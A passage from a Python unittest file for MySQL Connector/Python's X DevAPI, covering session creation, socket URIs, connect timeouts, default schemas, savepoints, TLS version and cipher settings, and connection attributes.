# Session creation is not possible with SSL disabled
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["auth"] = mysqlx.Auth.SHA256_MEMORY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Session creation is possible with SSL enabled
config["ssl-mode"] = mysqlx.SSLMode.REQUIRED
config["auth"] = mysqlx.Auth.PLAIN
mysqlx.get_session(config)
# Disable SSL
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
# Password is in cache will, session creation is possible
config["auth"] = mysqlx.Auth.SHA256_MEMORY
mysqlx.get_session(config)
sess.sql("DROP USER 'caching'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 15), "--mysqlx-socket option"
" tests not available for this MySQL version")
@unittest.skipIf(os.name == 'nt', "sockets not available"
" on windows")
def test_mysqlx_socket(self):
# Connect with unix socket
uri = "mysqlx://{user}:{password}@({socket})".format(
user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
socket=self.connect_kwargs["socket"])
session = mysqlx.get_session(uri)
# No SSL with Unix Sockets
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("OFF", res[0][1])
session.close()
# Socket parsing tests
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_connection_uri(self):
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
use_pure=False)
session = mysqlx.get_session(uri)
self.assertIsInstance(session, mysqlx.Session)
# Test URI parser function
for uri, res in _URI_TEST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
# Test URI parser function
for uri, res in _ROUTER_LIST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 13),
"MySQL 8.0.13+ is required for connect timeout")
def test_connect_timeout(self):
config = self.connect_kwargs.copy()
# 0 ms disables timouts on socket connections
config["connect-timeout"] = 0
session = mysqlx.get_session(config)
session.close()
# 10000 ms should be time enough to connect
config["connect-timeout"] = 10000
session = mysqlx.get_session(config)
session.close()
# Use connect timeout in URI
session = mysqlx.get_session(build_uri(**config))
session.close()
# Timeout for an unreachable host
# https://en.wikipedia.org/wiki/IPv4#Special-use_addresses
hosts = [
"198.51.100.255",
"192.0.2.255",
"10.255.255.1",
"192.0.2.0",
"203.0.113.255",
"10.255.255.255",
"192.168.255.255",
"203.0.113.4",
"192.168.0.0",
"172.16.0.0",
"10.255.255.251",
"172.31.255.255",
"198.51.100.23",
"172.16.255.255",
"198.51.100.8",
"192.0.2.254",
]
unreach_hosts = []
config["connect-timeout"] = 2000
# Find two unreachable hosts for testing
for host in hosts:
try:
config["host"] = host
mysqlx.get_session(config)
except mysqlx.TimeoutError:
unreach_hosts.append(host)
if len(unreach_hosts) == 2:
break # We just need 2 unreachable hosts
except:
pass
total_unreach_hosts = len(unreach_hosts)
self.assertEqual(total_unreach_hosts, 2,
"Two unreachable hosts are needed, {0} found"
"".format(total_unreach_hosts))
# Multi-host scenarios
# Connect to a secondary host if the primary fails
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": "127.0.0.1", "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Fail to connect to all hosts
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": unreach_hosts[1], "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
try:
mysqlx.get_session(uri)
self.fail("It should not connect to any unreachable host")
except mysqlx.TimeoutError as err:
self.assertEqual(err.msg,
"All server connection attempts were aborted. "
"Timeout of 2000 ms was exceeded for each "
"selected server")
except mysqlx.InterfaceError as err:
self.assertEqual(err.msg, "Unable to connect to any of the target hosts")
# Trying to establish a connection with a wrong password should not
# wait for timeout
config["host"] = "127.0.0.1"
config["password"] = "invalid_password"
config["connect-timeout"] = 2000
time_start = time.time()
self.assertRaises(InterfaceError, mysqlx.get_session, config)
time_elapsed = time.time() - time_start
session.close()
if time_elapsed >= config["connect-timeout"]:
self.fail("Trying to establish a connection with a wrong password "
"should not wait for timeout")
# The connect_timeout should be applied only for establishing the
# connection and not for all blocking socket operations
config = self.connect_kwargs.copy()
config["connect-timeout"] = 1000
session = mysqlx.get_session(config)
self.assertIsInstance(session, mysqlx.Session)
session.sql("SELECT SLEEP(2)").execute()
session.close()
# The connect_timeout value must be a positive integer
config["connect-timeout"] = -1
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = 10.0983
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = "abc"
self.assertRaises(TypeError, mysqlx.get_session, config)
def test_get_schemas(self):
schema_name = "test_get_schemas"
self.session.create_schema(schema_name)
schemas = self.session.get_schemas()
self.assertIsInstance(schemas, list)
self.assertTrue(schema_name in schemas)
self.session.drop_schema(schema_name)
def test_get_schema(self):
schema = self.session.get_schema(self.schema_name)
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.schema_name)
def test_get_default_schema(self):
schema = self.session.get_default_schema()
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.connect_kwargs["schema"])
self.assertTrue(schema.exists_in_database())
# Test None value is returned if no schema name is specified
settings = self.connect_kwargs.copy()
settings.pop("schema")
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test SQL statements not fully qualified, which must not raise error:
# mysqlx.errors.OperationalError: No database selected
self.session.sql('CREATE DATABASE my_test_schema').execute()
self.session.sql('CREATE TABLE my_test_schema.pets(name VARCHAR(20))'
).execute()
settings = self.connect_kwargs.copy()
settings["schema"] = "my_test_schema"
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(),
"my_test_schema")
result = session.sql('SHOW TABLES').execute().fetch_all()
self.assertEqual("pets", result[0][0])
self.session.sql('DROP DATABASE my_test_schema').execute()
self.assertFalse(schema.exists_in_database())
self.assertRaises(mysqlx.ProgrammingError, session.get_default_schema)
session.close()
# Test without default schema configured at connect time (passing None)
settings = self.connect_kwargs.copy()
settings["schema"] = None
build_uri(**settings)
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test not existing default schema at get_session raise error
settings = self.connect_kwargs.copy()
settings["schema"] = "nonexistent"
self.assertRaises(InterfaceError, mysqlx.get_session, settings)
# Test BUG#28942938: 'ACCESS DENIED' error for unauthorized user tries
# to use the default schema if not exists at get_session
self.session.sql("DROP USER IF EXISTS 'def_schema'@'%'").execute()
self.session.sql("CREATE USER 'def_schema'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
settings = self.connect_kwargs.copy()
settings['user'] = 'def_schema'
settings['password'] = 'test'
settings["schema"] = "nonexistent"
# a) Test with no Granted privileges
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Access denied for this user
self.assertEqual(1044, context.exception.errno)
# Grant privilege to one unrelated schema
self.session.sql("GRANT ALL PRIVILEGES ON nonexistent.* TO "
"'def_schema'@'%'").execute()
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Schema does not exist
self.assertNotEqual(1044, context.exception.errno)
def test_drop_schema(self):
test_schema = 'mysql_session_test_drop_schema'
schema = self.session.create_schema(test_schema)
self.session.drop_schema(test_schema)
self.assertFalse(schema.exists_in_database())
def test_create_schema(self):
schema = self.session.create_schema(self.schema_name)
self.assertTrue(schema.exists_in_database())
def test_sql(self):
statement = self.session.sql("SELECT VERSION()")
self.assertTrue(isinstance(statement, mysqlx.Statement))
# SQL statements should be strings
statement = self.session.sql(123)
self.assertRaises(mysqlx.ProgrammingError, statement.execute)
# Test unicode statements
statement = self.session.sql(u"SELECT VERSION()").execute()
self.assertTrue(isinstance(statement, mysqlx.SqlResult))
def test_rollback(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.rollback()
self.assertEqual(table.count(), 0)
drop_table(schema, table_name)
def test_commit(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.commit()
self.assertEqual(table.count(), 1)
drop_table(schema, table_name)
def test_savepoint(self):
collection_name = "collection_test"
schema = self.session.get_schema(self.schema_name)
# The savepoint name should be a valid string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, 123)
# The savepoint name should not be an empty string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, "")
# The savepoint name should not be a white space
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, " ")
# Invalid rollback savepoint without a started transaction
sp1 = self.session.set_savepoint("sp1")
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp1)
collection = schema.create_collection(collection_name)
self.session.start_transaction()
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
self.assertEqual(1, collection.count())
# Create a savepoint named 'sp2'
sp2 = self.session.set_savepoint("sp2")
self.assertEqual(sp2, "sp2")
collection.add({"_id": "2", "name": "Wilma", "age": 33}).execute()
self.assertEqual(2, collection.count())
# Create a savepoint named 'sp3'
sp3 = self.session.set_savepoint("sp3")
collection.add({"_id": "3", "name": "Betty", "age": 67}).execute()
self.assertEqual(3, collection.count())
# Rollback to 'sp3' savepoint
self.session.rollback_to(sp3)
self.assertEqual(2, collection.count())
# Rollback to 'sp2' savepoint
self.session.rollback_to(sp2)
self.assertEqual(1, collection.count())
# The 'sp3' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp3)
collection.add({"_id": "4", "name": "Barney", "age": 42}).execute()
self.assertEqual(2, collection.count())
# Create an unnamed savepoint
sp4 = self.session.set_savepoint()
collection.add({"_id": "3", "name": "Wilma", "age": 33}).execute()
self.assertEqual(3, collection.count())
# Release unnamed savepoint
self.session.release_savepoint(sp4)
self.assertEqual(3, collection.count())
# The 'sp4' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp4)
self.session.commit()
schema.drop_collection(collection_name)
def test_close(self):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
session.close()
self.assertRaises(mysqlx.OperationalError, schema.exists_in_database)
@unittest.skipIf(sys.version_info < (2, 7, 9), "The support for SSL is "
"not available for Python versions < 2.7.9.")
def test_ssl_connection(self):
config = {}
config.update(self.connect_kwargs)
socket = config.pop("socket")
# Secure by default
session = mysqlx.get_session(config)
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error on setting Client key without Client Certificate
config["ssl-key"] = tests.SSL_KEY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on settings CRL without setting CA Certificate
config["ssl-crl"] = "/dummy/path"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config.pop("ssl-crl")
# Error on setting SSL Mode to disabled with any SSL option
config["ssl-mode"] = "disabled"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on setting SSL Mode to verify_* without ssl_ca
config["ssl-mode"] = "verify_ca"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["ssl-mode"] = "verify_identity"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on SSL Mode set to required with CA set
config["ssl-ca"] = tests.SSL_CA
config["ssl-cert"] = tests.SSL_CERT
config["ssl-mode"] = "required"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Connection with ssl parameters
# Setting an invalid host name against a server certificate
config["host"] = "127.0.0.1"
# Should connect with ssl_mode=False
config["ssl-mode"] = "verify_ca"
session = mysqlx.get_session(config)
res = session.sql(
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
# Should fail to connect with verify_identity
config["ssl-mode"] = "verify_identity"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Should connect with verify_identitythe and correct host name
config["host"] = "localhost"
config["ssl-mode"] = "verify_identity"
session = mysqlx.get_session(config)
res = session.sql(
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = session.sql(
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error if ssl-mode=disabled and ssl_* set
extra = [("ssl_mode", "disabled"),
("ssl_ca", "({0})".format(tests.SSL_CA))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Error if invalid ssl-mode
extra = [("ssl_mode", "invalid")]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Parsing SSL Certificates
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA, False)),
("ssl_key", file_uri(tests.SSL_KEY, False)),
("ssl_cert", file_uri(tests.SSL_CERT, False))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA)),
("ssl_key", file_uri(tests.SSL_KEY)),
("ssl_cert", file_uri(tests.SSL_CERT))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
@unittest.skipIf(sys.version_info < (2, 7, 9), "The support for SSL is "
"not available for Python versions < 2.7.9.")
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 40), "TLSv1.1 incompatible")
def test_get_session_with_tls_version(self):
# Test None value is returned if no schema name is specified
settings = self.connect_kwargs.copy()
settings.pop("schema")
settings.pop("socket")
# Dictionary connection settings tests using dict settings
# Empty tls_version list
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
self.assertTrue(("At least one" in context.exception.msg), "Unexpected "
"exception message found: {}"
"".format(context.exception.msg))
# Empty tls_ciphersuites list using dict settings
settings["tls-ciphersuites"] = []
settings["tls-versions"] = ["TLSv1"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Given tls-version not in ["TLSv1.1", "TLSv1.2", "TLSv1.3"]
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv0.2", "TLSv1.7", "TLSv10.2"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Repeated values in tls-versions on dict settings
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.2", "TLSv1.1", "TLSv1.2"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Empty tls-versions on dict settings
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
self.assertTrue(("At least one TLS" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Verify unkown cipher suite case?
settings["tls-ciphersuites"] = ["NOT-KNOWN"]
settings["tls-versions"] = ["TLSv1.2"]
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# URI string connection settings tests
# Empty tls_version list on URI
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("At least one" in context.exception.msg), "Unexpected "
"exception message found: {}"
"".format(context.exception.msg))
# Empty tls_ciphersuites list without tls-versions
settings["tls-ciphersuites"] = []
settings.pop("tls-versions")
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Empty tls_ciphersuites list without tls-versions
settings["tls-ciphersuites"] = ["INVALID"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("value 'INVALID' in cipher" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
settings["tls-ciphersuites"] = "INVALID"
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Invalid value on tls_version list on URI
settings.pop("tls-ciphersuites")
settings["tls-versions"] = "INVALID"
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("tls-version: 'INVALID' is" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Empty tls_ciphersuites list
settings["tls-ciphersuites"] = []
settings["tls-versions"] = ["TLSv1"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("No valid cipher suite" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Given tls-version not in ["TLSv1.1", "TLSv1.2", "TLSv1.3"]
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv0.2", "TLSv1.7", "TLSv10.2"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
# Empty tls-versions list
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = []
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("At least one TLS" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Repeated values in tls-versions on URI
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.2", "TLSv1.1", "TLSv1.2"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
# Repeated tls-versions on URI
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.2", "TLSv1.3"]
uri_settings = build_uri(**settings)
uri_settings = "{}&{}".format(uri_settings,
"tls-versions=[TLSv1.1,TLSv1.2]")
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("Duplicate option" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Verify InterfaceError exception is raised With invalid TLS version
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv8"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
self.assertTrue(("not recognized" in context.exception.msg),
"Unexpected exception message found: {}"
"".format(context.exception.msg))
# Verify unkown cipher suite case?
settings["tls-ciphersuites"] = ["NOT-KNOWN"]
settings["tls-versions"] = ["TLSv1.2"]
uri_settings = build_uri(**settings)
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(uri_settings)
# Verify that TLSv1.3 version is accepted (connection success)
# even if it's unsupported.
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.3", "TLSv1.2"]
uri_settings = build_uri(**settings)
# Connection must be successfully by including another TLS version
_ = mysqlx.get_session(uri_settings)
supported_tls = check_tls_versions_support(
["TLSv1.2", "TLSv1.1", "TLSv1"])
if not supported_tls:
self.fail("No TLS version to test: {}".format(supported_tls))
if len(supported_tls) > 1:
# Verify given TLS version is used
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
for tes_ver in supported_tls:
settings["tls-versions"] = [tes_ver]
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_version%'"
).execute().fetch_all()
for row in status:
if row.get_string("Variable_name") == 'Mysqlx_ssl_version':
self.assertEqual(row.get_string("Value"), tes_ver,
"Unexpected TLS version found: {} for: {}"
"".format(row.get_string("Value"),
tes_ver))
# Following tests requires TLSv1.2
if tests.MYSQL_VERSION < (8, 0, 17):
return
if "TLSv1.1" in supported_tls:
# Verify the newest TLS version is used from the given list
exp_res = ["TLSv1.2", "TLSv1.1", "TLSv1.2"]
test_vers = [["TLSv1", "TLSv1.2", "TLSv1.1"], ["TLSv1", "TLSv1.1"],
["TLSv1.2", "TLSv1"]]
for tes_ver, exp_ver in zip(test_vers, exp_res):
settings["tls-versions"] = tes_ver
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_version%'"
).execute().fetch_all()
for row in status:
if row.get_string('Variable_name') == 'Mysqlx_ssl_version':
self.assertEqual(row.get_string('Value'), exp_ver,
"Unexpected TLS version found: {}"
"".format(row.get_string('Value')))
# Verify given TLS cipher suite is used
exp_res = ["DHE-RSA-AES256-SHA256", "DHE-RSA-AES256-SHA256",
"DHE-RSA-AES128-GCM-SHA256"]
test_ciphers = [["TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"],
["DHE-RSA-AES256-SHA256"],
["TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"]]
settings["tls-versions"] = "TLSv1.2"
for test_cipher, exp_ver in zip(test_ciphers, exp_res):
settings["tls-ciphersuites"] = test_cipher
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_cipher%'"
).execute().fetch_all()
for row in status:
if row.get_string("Variable_name") == "Mysqlx_ssl_cipher":
self.assertEqual(row.get_string("Value"), exp_ver,
"Unexpected TLS version found: {} for: {}"
"".format(row.get_string("Value"),
test_cipher))
# Verify one of TLS cipher suite is used from the given list
exp_res = ["DHE-RSA-AES256-SHA256", "DHE-RSA-AES256-SHA256",
"DHE-RSA-AES128-GCM-SHA256"]
test_ciphers = ["TLS_DHE_RSA_WITH_AES_256_CBC_SHA256",
"DHE-RSA-AES256-SHA256",
"TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"]
settings["tls-ciphersuites"] = test_ciphers
settings["tls-versions"] = "TLSv1.2"
uri_settings = build_uri(**settings)
session = mysqlx.get_session(uri_settings)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_cipher%'"
).execute().fetch_all()
for row in status:
if row.get_string("Variable_name") == "Mysqlx_ssl_cipher":
self.assertIn(row.get_string("Value"), exp_res,
"Unexpected TLS version found: {} not in {}"
"".format(row.get_string('Value'), exp_res))
if "TLSv1.1" in supported_tls:
# Verify behavior when "TLSv1.3" is not supported.
if TLS_V1_3_SUPPORTED:
exp_tls_ver = "TLSv1.3"
else:
exp_tls_ver = "TLSv1.2"
# connection success with secundary TLS given version.
settings["tls-ciphersuites"] = ["DHE-RSA-AES256-SHA"]
settings["tls-versions"] = ["TLSv1.3", "TLSv1.2"]
settings_n = 0
for settings_case in [settings, build_uri(**settings)]:
settings_n +=1
session = mysqlx.get_session(settings_case)
status = session.sql("SHOW STATUS LIKE 'Mysqlx_ssl_version%'"
).execute().fetch_all()
for row in status:
if row.get_string('Variable_name') == 'Mysqlx_ssl_version':
self.assertEqual(row.get_string('Value'), exp_tls_ver,
"Unexpected TLS version {} while using settings#{}"
": {}".format(row.get_string('Value'),
settings_n, settings_case))
# Verify error when TLSv1.3 is not supported.
if not TLS_V1_3_SUPPORTED:
settings["tls-versions"] = ["TLSv1.3"]
for settings_case in [settings, build_uri(**settings)]:
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings_case)
def test_disabled_x_protocol(self):
session = mysqlx.get_session(self.connect_kwargs)
res = session.sql("SHOW VARIABLES WHERE Variable_name = 'port'") \
.execute().fetch_all()
settings = self.connect_kwargs.copy()
settings["port"] = res[0][1] # Lets use the MySQL classic port
session.close()
self.assertRaises(ProgrammingError, mysqlx.get_session, settings)
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
@unittest.skipUnless(HAVE_PROTOBUF, "Protobuf not available")
def test_use_pure(self):
settings = self.connect_kwargs.copy()
settings["use-pure"] = False
session = mysqlx.get_session(settings)
self.assertFalse(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb")
session.use_pure = True
self.assertTrue(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb_pure")
# 'use_pure' should be a bool type
self.assertRaises(ProgrammingError, setattr, session, "use_pure", -1)
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 16), "XPlugin not compatible")
def test_connection_attributes(self):
# Validate an error is raised if URL user defined connection attributes
# given in a list are invalid
invalid_conn_attrs = [2, 1.2, "[_='13']", '[_="1"]', '[_=23]', "[_2.3]",
"[_invalid]", "[valid=0,_]", "[valid=0,_nvalid]",
"[_invalid,valid=0]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# are not a list or a bool type
invalid_conn_attrs = ["[incompleteL", "incompleteL]", "A", "invalid",
"_invalid", "2", "2.3", "{}", "{invalid=0}",
"{[invalid=0]}", "_", 2, 0.2]
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# through a connection URL when a name is duplicated
connection_attributes = {
"foo": "bar",
"repeated": "attribute",
"baz": "zoom",
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
uri = "{},repeated=duplicate_attribute]".format(uri[0:-1])
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(uri)
LOGGER.error("InterfaceError not raised while testing "
"uri: {}".format(uri))
self.assertTrue("Duplicate key 'repeated' used in "
"connection-attributes" in context.exception.msg)
# Test error is raised for attribute name starting with '_'
connection_attributes = [
{"foo": "bar", "_baz": "zoom"},
{"_baz": "zoom"},
{"foo": "bar", "_baz": "zoom", "puuuuum": "kaplot"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
